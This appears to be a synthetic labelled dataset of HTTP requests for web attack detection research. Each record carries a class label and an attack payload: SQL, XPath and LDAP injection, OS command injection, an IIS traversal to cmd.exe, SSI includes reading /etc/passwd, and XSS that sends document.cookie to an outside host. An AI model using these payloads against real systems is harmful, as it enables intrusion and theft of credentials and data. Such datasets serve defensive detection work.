MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://uiMgkI.net/TaWt/ssnce.png
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: ey2mv6bgh0i
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47159
Start - Id: 43882
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.peiuia.net:80
Connection: close
Accept: text/html;q=0.1, audio/*, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 182.179.139.200
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="294"
Date: Sat, 10 Nov 07 19:36:00 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: etc4ouNl=anmics2L
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: "j2zPSsbUPKqCmgA7h6V3"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: "sEmGKjYhKUj0AqLv08J"
Max-Forwards: 063
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dkVhczg6c2V0cG9laHA=
Range: 40517-,9-9675
Referer: http://Iueel.fr/oElnNlhp/ut3codm.asp
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 6.9; bf-sh; rv:0.8.9) Gecko/55593251
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 629x1097
Via: 6.1 176.155.150.83, FTP/6.3 97.182.50.39
Transfer-Encoding: compress
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43882
Start - Id: 41472
class: SqlInjection
POST /llrameeita/sFtad8Fonealooh/plsItN6ohN/lcrttme/ap2GGEQ7wfgXf/et/sZ_KNH6I.htm? HTTP/1.0
Content-Length: 105
Content-Language: iwu0rah
Content-Encoding: compress
Content-Location: http://www.btetea.be/Ipale/h4ew.dll
Content-MD5: ZXNtZWduNmVpcm5jem1pMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: www.snNa.org
Connection: rcgo4ah
Accept: */*
Accept-Charset: x-mac-japanese;q=0.8, x-mac-arabic;q=0.9, windows-1252;q=0.9, koi8;q=0.6, iso-8859-15
Accept-Encoding: compress;q=0.5, identity, gzip;q=0.4
Accept-Language: iz-6hj3ytEh, sthe-b5ijbo;q=0.5
Cache-Control: max-age=62
Client-ip: 33.190.206.236
Cookie: layj=0661907274;ooxthe=1803576;tai=Hdariy6;euee=85218566
Cookie2: $Version="4"
Date: Sun, 11 Oct 09 11:55:22 CET
ETag: "nsj4W3Nz7TJqZ.8v25xp"
Expect: 5eo6u
From: t0cih@nlhtfemb7.st
If-Modified-Since: Tue, 30 Oct 07 07:28:55 UTC
If-Unmodified-Since: Sun, 13 Jul 08 17:43:47 UTC
If-Match: "wbslCcTvXnpxgPY4b"
If-None-Match: "q62g2dt3wft4Rwpc"
If-Range: "G4HagSgcpYfK4cVU"
Max-Forwards: 819
MIME-Version: 0.6
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Basic aGVBY2hybWY6dG4zcjl4
Range: -4,14416-132055
Referer: /auIc/oe5orEr/0o8Oi/iwyegni/e8A3n.msf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 2.3; mE-5s; rv:2.1.6) Gecko/04104923
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 054x8213
Via: 2.2 www.iihes.htm, 5.5 27.3.254.63, 3.7 www.abnpo.css:5859
Transfer-Encoding: identity
Upgrade: duea/0.0
Warning: 013 130.95.230.195 "uusnotnttoteatpfbu1" "Tue, 08 Nov 05 20:23:16 GMT"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t4Whn7ebyee=chairs' UN/**/ION     SEL/**/ECT   iaaFa FROM dba_users WHERE cl     like  '%25

End - Id: 41472
Start - Id: 42399
class: SqlInjection
GET /ibnH/9tsgldee.css?aejxelhda0htt=9TmzzS8Zr&gaKse=5&iscg=250&etprdreeee=6507830&vi2dftfcAQ=stbfwree1lir&td3atlsie=ormse&tkauysize9e=5%7Epz&ribiepe=%27+OR+%276fvh%27+%3C+%27X&maugI=r&Ncesi6wioRltoo=tw2n7e9prn&2cnytheeltMrr=uOdq7DXaoLF6&cishzj=338&0kmowie=ciftwhMh%27&sesciwa9hnlyme=eQ6D HTTP/1.1
Host: 34.48.130.173
Connection: keep-alive
Accept: application/x-tar;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, identity;q=0.5, identity, compress;q=0.0, compress;q=0.9
Accept-Language: htULrf-eanm4;q=0.2
Cache-Control: no-transform
Client-ip: 27.25.131.119
Cookie: xoxI=s;pt8jfbrn=wnlhalnve77rlr;R0t6Enc1aiori=0dD>eet s|/LneuousteC;i0KrddNsmt=609248223;ddbailtatjoinnr=AeedSieynbtghemn;Nssm1eondvz=o9 1t(ne((t -
Cookie2: $Version="7"
Date: Thu, 23 Jul 09 10:46:03 GMT
ETag: "i@eKiHVxyOned_iJ9n4"
Expect: aobdyaog
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 28 Jan 07 02:26:27 CET
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: Thu, 26 Jan 06 09:38:58 UTC
Max-Forwards: 60
MIME-Version: 2.5
Pragma: IK=tsbte
Proxy-Authorization: JslOti auhh=xthke
Authorization: r1dh9i e8eemggy=tumI
Range: -4,92807-997,-01613
Referer: http://Daio.be/rnxIn.png
TE: chunked;q=0.7
Trailer: Host
User-Agent: t4psee0os2doI4cD
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: deflate
Upgrade: Cuscnt/3.0
Warning: 630 www.qHomhe.tiff "xvqr" 
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42399
Start - Id: 47139
class: XSS
GET /do/Ivrauirv3cktin.php?tuesTdno=%3Cmeta+++http-equiv+++%3D+%22refresh++%22+++content++%3D%22+++0%3Burl%3Djavascript%3A++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.stmeng.com%2Fcgi-bin%2Fre.cgi%27%2Bdocument.cookie%29%3B%5D++%22+++%3E HTTP/1.0
Host: www.adotyfoAa.net
Connection: hCofuLe
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.7, compress, gzip
Accept-Language: *;q=0.1
Cache-Control: a9u='texeb'
Client-ip: 127.106.132.180
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="732"
Date: Mon, 03 Nov 08 14:19:56 CET
ETag: W/"DaLjRExWtsG.SEkNd"
Expect: 100-continue
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Tue, 07 Dec 04 02:13:31 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: "1SNI7.GHyFvSP_@Ea"
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM c2VzcmUwUTJpZWV5b3RvZWNTdGhodGVjaXN0b3BhbnNzYXdidHR1c3o0c2lPVw==
Range: -63707,310050-133
Referer: http://www.z8gmr.fr/dvmtt1/ntthf/3unlcac/tgtcHu/3lsp.jpg
TE: trailers
Trailer: Via
User-Agent: eqOth/3.0.8.1.3
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: identity
Upgrade: 8cCE/0.8, oso9/9.4, 3nw/2.9, zDsi/8.2, 6hhwb/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 710374983
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47139
Start - Id: 46735
class: XSS
GET /d5i@valmCeS-SX/wO9f5oudrxleryeirrr/tys@nZF9/nndtm/eunn/Hu5hdcWt4zr/NJFandMpsi./6I52@m.nsf? HTTP/1.1
Host: 175.195.232.134:23206
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=696
Client-ip: 33.57.4.233
Cookie: crie=<iframe  src   = " vbscript:[window.open('http://184.100.137.105/aserna.exe'+document.cookie);]      "  >;1o0=nph-spvsrta4 0tservices0a&wgete vbscript;woleet=tlse'lne%libpj b6dlr
Cookie2: $Version="78"
Date: Tue, 10 Apr 07 08:41:17 GMT
ETag: "4@ok28_Tv@xVUoBPU."
Expect: 100-continue
From: Ertclen@yaez.com
If-Modified-Since: Wed, 08 Apr 09 12:31:25 GMT
If-Unmodified-Since: Wed, 26 Aug 09 23:36:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 May 08 07:56:52 GMT
Max-Forwards: 790
MIME-Version: 1.1
Pragma: tdgIesn='Eaet'
Proxy-Authorization: dNtwcd 6dptZm=tetko
Authorization: Basic Z3JkbHNsOnNKMWp0MXI=
Range: 112-7,674-5
Referer: /ut3n5tjs/oilEodr/zerhh/srRa.asmx
TE: chunked
Trailer: If-Match
User-Agent: eahrrir8 (dNwyc1xnG; cGkz4P; grZiz0km; oba_JREMd)
UA-CPU: StrongARM
UA-OS: Win98
UA-Color: color32
UA-Pixels: 318x240
Via: 7.6 www.xrQyh1t.htm, FTP/6.3 201.120.87.115, 6.1 www.rT2tn.jpeg
Transfer-Encoding: identity
Upgrade: nasb/8.9, sn6a/0.6, vss/6.2
Warning: 010 www.a8sa.htm "nmhkcmhseac2rng" "Wed, 04 Jun 08 06:13:20 UTC"
X-Forwarded-For: 235.233.246.128
X-Serial-Number: 293931197401381
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46735
Start - Id: 39744
class: SSI
GET /EWk/3MIZ.CH.@E6bp/gmpNQMY9elggewx3ZE.png?sr0ok=bgsoundvbscript&oq=hSsxp_dyAddGsrcOm&Xo8qmAaw=rZ8U22u&i6eyisuxguc=115175892&MHpe7teje=71519&Siaaft=mlr&stanonax55iha=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&dnaislhi=8552&yiedtttrtaet=853530&iianbn7a3yU=allaroe&kjnoeot8a=45654128 HTTP/1.0
Host: www.Snno9oottt.it
Connection: keep-alive
Accept: image/gif;q=0.9
Accept-Charset: iso-2022-kr, x-mac-roman;q=0.7, us-ascii;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 10.65.26.121
Cookie: lrmoaenbdlUe=91;hrfoldwu=7;Lese7liwrh=feiframeelboot.inilen1omhha
Cookie2: $Version="7"
Date: Sun, 12 Jul 09 14:27:19 GMT
ETag: W/"gziqNRWgeKEuw_Gs"
Expect: td7ebjge
From: n4tbla@ol8e.st
If-Modified-Since: Tue, 27 Nov 07 22:59:17 UTC
If-Unmodified-Since: Tue, 11 Sep 07 03:56:29 GMT
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "WS-AYxw8TAVXttq"
If-Range: *
Max-Forwards: 2965
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: nyks7 tHmRb8=vgc3
Range: -343,5-1
Referer: /otnssp/ennnnah.php3
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: aaso (egQghr; oTisVckBRC; a4mKR2G@K)
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: jbrs/4.9 151.201.52.185, 7.9 www.Genen.jpeg
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39744
Start - Id: 48873
class: XPathInjection
GET /a05eQRQjE/TotUrsU7ni/e7Ndsi/cDlv2Zc@/tmpunetcatxOXtN0aa0/tmaio8k/nrh1vxwPeiNq4na8mGC/o58nrdghaosylgRatd/j178DbNv3T@gQNEpQSRL.tiff?rMhYreTuthj=2&Oie=azs%27+++or++6++++%3C++++count%28path%2Fchild%3A%3A*%29++or++++%27To%27++%3D%27&UuZIiANjaqrm=0119770&-fgNK=7325&hapfta=814&aatedH=j%5Cte&h5=09315&tcefidd=46&mndAryul=t+&.tHtmp@4Sw5XK=81030243 HTTP/1.0
Host: 189.58.241.242
Connection: lsm8nyy
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: O3suol-imd;q=0.9, tr-qln4a, rcortls-nto, eo78qe-eentP;q=0.9
Cache-Control: min-fresh=9624
Client-ip: 81.197.139.145
Cookie: nhe9lv=<yl's;eeitn=o0o
Cookie2: $Version="7"
Date: Sun, 24 Feb 08 21:31:24 UTC
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: tT6sz@uCil5yEad.be
If-Modified-Since: Sat, 29 May 04 05:16:03 GMT
If-Unmodified-Since: Mon, 09 Nov 09 22:11:13 UTC
If-Match: *
If-None-Match: "RZt2ncEPb9yewnPnIlh"
If-Range: Sun, 20 Nov 05 23:24:01 GMT
Max-Forwards: 234
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 03033-94733
Referer: http://NaeeF9t.net/6ngo6e/rDhdeta/qehcscse/ehht.mspx
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (compatible; rmte; Windows NT; tno2tc; cm0uajd)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 1.9 30.139.77.167
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 3294435
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48873
Start - Id: 44552
class: OsCommanding
GET /bin/lq.pl/seite=;cat eshop.pl|? HTTP/1.0
Host: www.neediE1wr.net
Connection: uevtoc
Accept: application/*;q=0.7
Accept-Charset: euc-cn, iso-2022-kr;q=0.1, x-mac-japanese;q=0.1, iso-8859-9;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: wtenkqr1pqole=4706;8qny=lash;yr=0;9cwaesign=212b84Fa
Cookie2: $Version="7"
Date: Sun, 30 Apr 06 23:09:16 GMT
ETag: "bt4AuWPRNz3QSPEVL"
Expect: etsb1rf=swx0Pizc;eneui
From: tzi1ete@elNpu.cz
If-Modified-Since: Sun, 04 Dec 05 03:58:39 GMT
If-Unmodified-Since: Mon, 20 Aug 07 04:47:23 UTC
If-Match: "JYZEs@uQtoT38q9rf11B"
If-None-Match: "Rac20ZHVWp9u2Qyv41F"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 9997
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: tttq amii=me2Eecta
Authorization: NTLM b2k2NTRBeWFmcG5tQXhjcmhsanJkYW9tMzZ3bmpFZW13TGJnYWVldzBoZW5j
Range: -06354,383-6635,26244-
Referer: /orddlpf/veht/csoxs/ns8uvh.asmx
TE: gzip,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: aaoa16atm
UA-CPU: Sparc
UA-Pixels: 685x9987
Via: HTTP/0.7 www.momr.css:61, 5.6 218.229.183.108, 1.1 105.181.169.26:823
Transfer-Encoding: deflate
Warning: 647 www.OdtcirTi.shtml "hsqmvKttea7a" 
X-Serial-Number: 45665901186378788222
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44552
Start - Id: 45875
class: PathTransversal
GET /sShMrv4pk9F0./hoi5s8hlaoucOlsta/3ONti/samaccess_logAqeval/u@hKJD9Vr2hi8L/est5wroviuo/dwi9dnnu/bWxm/onlu/uEZEbwe/rass.msf?Sxralkeoytso9=9%3A%5Cautoexec.bat HTTP/1.0
Host: www.noziiaal.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, identity
Accept-Language: eZr-h;q=0.4, Dio-lsden, eirho-7zT;q=0.2, ehjlinin-oet;q=0.8, rlr-inmt3;q=0.8
Cache-Control: max-age=289
Client-ip: 251.11.69.130
Cookie: asikot5=8858432;dreveasTtnin5z6=sstoee+rldgpdy-ipea;a8nesm2hWtt=36154640
Cookie2: $Version="07"
Date: Wed, 20 Apr 05 13:36:09 CET
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: 5roeHeR9@nsl4pe.de
If-Modified-Since: Sun, 19 Aug 07 19:59:05 UTC
If-Unmodified-Since: Tue, 17 Apr 07 03:27:09 CET
If-Match: "G26ugG9CeSPmKJsmF."
If-None-Match: *
If-Range: "2oL1BrrKhANnmULkAM"
Max-Forwards: 3
MIME-Version: 7.2
Pragma: dphomlYI=tI
Proxy-Authorization: NTLM b2hmdHJpYmF0aUFzZWFwRjRpbGw2ZmUxc3dyaGRzMnllZmhtZGg3M2hhdGhl
Authorization: NTLM ZTB0ZWdkbnNucHRlcnNzaGVzbmpvYXBtYmVuc29lc2llbHR0Q3lTaXRnU29yYw==
Range: 81947-,357703-
Referer: /pnbol/toin.cfm
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: IeRnroo (efKwhxROFp; lapk.RhOdS; fOZsS7M7Ec)
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: 7.8 www.2Sennyn.jpg:7537, 3.9 www.esrT.htm, HTTP/5.1 134.72.214.137
Transfer-Encoding: deflate
Upgrade: uerl/3.0, gur/9.5, vSut/6.5
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 9205115584869
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45875
Start - Id: 35474
class: XPathInjection
GET /qOYj/i._8gcIdq/s47iCtStNv_q-du50J/tArdaotrcSntgh/vt/tejaly.php3? HTTP/1.1
Host: 115.191.110.206
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sntrccr'   or   fn/do/child::node()[processing-instruction()=87]     or    'dnos'=  '
Cache-Control: no-store
Client-ip: 59.239.90.47
Cookie: tWoghfulits=gohzm2TA5
Cookie2: $Version="64"
Date: Tue, 25 Jul 06 15:07:13 UTC
ETag: W/"8kE08l2MEJ9HkO6"
Expect: 100-continue
From: djepela@Ereu.st
If-Modified-Since: Wed, 08 Aug 07 02:04:51 CET
If-Unmodified-Since: Fri, 30 Oct 09 24:57:51 UTC
If-Match: *
If-None-Match: ".dgSZX4FqE7N2XCKf"
If-Range: "UqLtyWee9A0mveZ"
Max-Forwards: 3790
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: NTLM QWFvak5hY2MwaHJ0ZHRlVHI4Z2xlYXRyeWVyOGZnbjZha2FpdWI=
Range: 527-,12-81
Referer: http://ahhn8bs.de/nnnt7/EtPebt/eyce.doc
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 4.8; sS-qo; rv:1.9.8) Gecko/37124932
UA-CPU: x86
UA-Disp: 1801,706,8
UA-Color: color16
Via: FTP/3.9 www.whsiis.png:4331
Transfer-Encoding: nhhqnE; smEhr=6Bhpnnvc
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"
X-Forwarded-For: 140.122.154.142

null

End - Id: 35474
Start - Id: 39844
class: SSI
POST /ili4Yyn/eymnotnPdTe/rPV6Xvq09/droagZ/dZXsJ/leo4nixedcb/g4LUfm.G84Vul-xf2BJ/e3it/oaottu84pr.swf? HTTP/1.0
Content-Length: 18
Content-Language: Afa
Content-Encoding: identity
Content-Location: /xtsazI/neu7ipn/hhor/oxer/eahlgdei.swf
Content-MD5: bERneWU0ZmthZ2cwc2Fydw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Mar 04 03:20:40 GMT
Last-Modified: Tue, 05 Jun 07 24:54:35 GMT
Host: 251.169.141.255
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate
Accept-Language: <!--   #include  virtual="/etc/passwd" -->
Cache-Control: no-cache
Client-ip: 164.183.207.94
Cookie: ol7i=0926;fMvB=r;vbro4=ep0q|e
Cookie2: $Version="263"
Date: Thu, 19 Nov 09 11:11:55 UTC
ETag: "dUDViYkUsEROtwTmV1"
Expect: 100-continue
If-Modified-Since: Tue, 17 Jun 08 19:21:08 CET
If-Unmodified-Since: Sun, 26 Dec 04 23:53:03 UTC
If-Match: "5QS4Lc_q6Ppj2vj"
If-None-Match: "653S-99uM65v4vt687a"
Max-Forwards: 28
Authorization: NTLM blN2eWE3ZWVlNndydWh3d3Rubmd0WmVvZGFlbGV3ZWhjUmVIUWhvb29x
Referer: /datrg.js
TE: trailers
User-Agent: nbILie http://www.cdriei.org
UA-CPU: PowerPC
UA-Disp: 7982,461,16
Via: Fhsene/0.0 130.116.175.2, 6.0 www.tsrtbdlb.css, 2.8 56.148.197.156:2039
Warning: 062 171.240.19.144 "m0ktaeeesstoeip" 

hl5=epasswd&lre=ie

End - Id: 39844
Start - Id: 37455
class: LdapInjection
GET /iu@W5B0pypC6A.php?7ews1fsreE=enQYZyXz%40&9.access_loglinkAZ=tTot1kcqn5reTi&1wpneavyromR2te=nej8arh.&cyahiluehkt=856301708&d4qoketaludOle=9107219&rvpaa=sCx&eiimOafsqr8n=%25Lvar%270 HTTP/1.1
Host: 63.88.218.64
Connection: close
Accept: image/png;q=0.3, image/*;q=0.8, video/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.9, gzip;q=0.0, compress;q=0.4, gzip;q=0.0, identity
Accept-Language: *;q=0.7
Cache-Control: min-fresh=963
Client-ip: 64.57.122.77
Cookie: nSsesf3aw=106;eruenno7i=)(   |( cn=*o'brien*  )(mail    =*o    'brien*    )   ;5am1stbnblif=98878;bas=nullibinhl;skfaxEwaaOd=redlrt0Tbws9o;Htuihtnyn=1aan
Cookie2: $Version="894"
Date: Sun, 06 Dec 09 12:39:31 UTC
ETag: "jkTUJPFiI2zGOm7"
Expect: 100-continue
From: cdnol@lztd.biz
If-Modified-Since: Sun, 20 Sep 09 01:30:34 CET
If-Unmodified-Since: Tue, 13 Oct 09 13:17:09 GMT
If-Match: "1j5z4DKXBZDkrkD"
If-None-Match: "dHS3YLcywlMQbx-lRL"
If-Range: Sat, 06 May 06 15:35:37 CET
Max-Forwards: 460
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM MWUxbm9odEV1eW1vYWhrbTBoOFBJbHBwbHB0Y29zbmVu
Authorization: Basic aWxnck9lYWE6c2xobw==
Range: -85,-288767
Referer: /NhhuRfnv/ne5t/iuxetd.sh
TE: trailers,deflate;q=0.1
Trailer: Connection
User-Agent: Mozilla/5.1 (Windows; U; Win98 9.2; i9-ez; rv:9.6.1) Gecko/32846776
UA-CPU: MIPS
UA-Disp: 732,386,8
UA-Pixels: 161x1713
Via: 5.3 www.nl7rlho.htm, ABaoe9/3.3 55.149.28.157
Transfer-Encoding: epdh
Upgrade: oaoaii/1.1
Warning: 096 174.39.85.65 "dibesnanterur8nmCi" "Tue, 31 Jul 07 06:05:07 CET"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37455
Start - Id: 35389
class: SqlInjection
GET /1ttomioNy/gl/eLuPTOVSpl4AuqsI/hneeGo4tgitOiEeaoGj/kbAJW8NFk4WXiBX/ss2AleiaeadoImiyiT/oa0thit0fkseEp/eEYaR3.asp?ee=cRlslordodi&iewi=nessnh%7Eetel&b7._=3r&osgatsxcpi=992170&ezi=%3B+++++EXEC%28+%27INS%27%2B%27ERT++++INTO+users+values%28829%2C%27e0gbaDee%27%2C%27hEra7m%27++++%29%29&prNdnlNamSwndl=tFRpVSVjFIT&rhPpedre=luy2S4 HTTP/1.1
Host: www.hedFhngm5.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.3
Accept-Encoding: deflate, gzip
Accept-Language: ssll-8i, msa-ro;q=0.3
Cache-Control: W99o='gBh'
Client-ip: 190.92.194.186
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="20"
Date: Mon, 25 Aug 08 20:27:28 UTC
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: ta1Ecwsh=4waohsyh;84resi=rttalif
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Mon, 12 Apr 10 15:52:10 GMT
If-Unmodified-Since: Tue, 19 May 09 06:51:15 UTC
If-Match: "4nelpuV@OWJGSxHGJ"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: tfdyi wetoINl=Wpol
Range: 55-,0-,6611-
Referer: /tSand8/goIe/gkaaoA/whtenr/amet.rar
TE: trailers,gzip
Trailer: Transfer-Encoding
User-Agent: e49N4n4U http://www.7gtn.com
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: identity
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35389
Start - Id: 42487
class: SqlInjection
GET /tji/rBMsyggWe9ueNW/KSXnc-bgsoundYG6/f_OzgrhCpHV/oVW/2k4raedshceA/9.JQ1TQCh/edoe/lehsHamt.aspx?lsngs=cngeesvop+wg&or=5++or+id%3E7+++or++ls_id%3C639&hE=cm7ettlbio&rtt1wply1csg8E=ita&areEer3hvqhcau0=hi++cdeleted%29stnchhrie HTTP/1.1
Host: 45.46.248.78:36517
Connection: ecpioe
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: onnal-baoS;q=0.0, dlm-er, OEp-Fo;q=0.0, atne-ruesee9, ee-i7
Cache-Control: x1eee=lehelvrp
Client-ip: 215.176.56.170
Cookie: mtermtcairtfyHp=egKoae]y;tenEtapu=ah;nf5lhy=6015892;ygaYedafrnoetc=r8MuKzqIe9;RcY3KO=h
Cookie2: $Version="2"
Date: Sat, 23 Jan 10 18:17:17 CET
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sat, 02 Apr 05 24:55:46 GMT
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Dec 08 11:25:45 UTC
Max-Forwards: 0
MIME-Version: 8.5
Pragma: nbseinfe='xroA2dac'
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: NTLM a2U3Zmk2dGVrT1RybURzMGVuTXN6Z2RuT2loc2Vuc2V1bWVzY3BpYmtycw==
Range: 7-59040
Referer: /sOpztte.dll
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: hztoeOtav/1.1.2
UA-CPU: x86
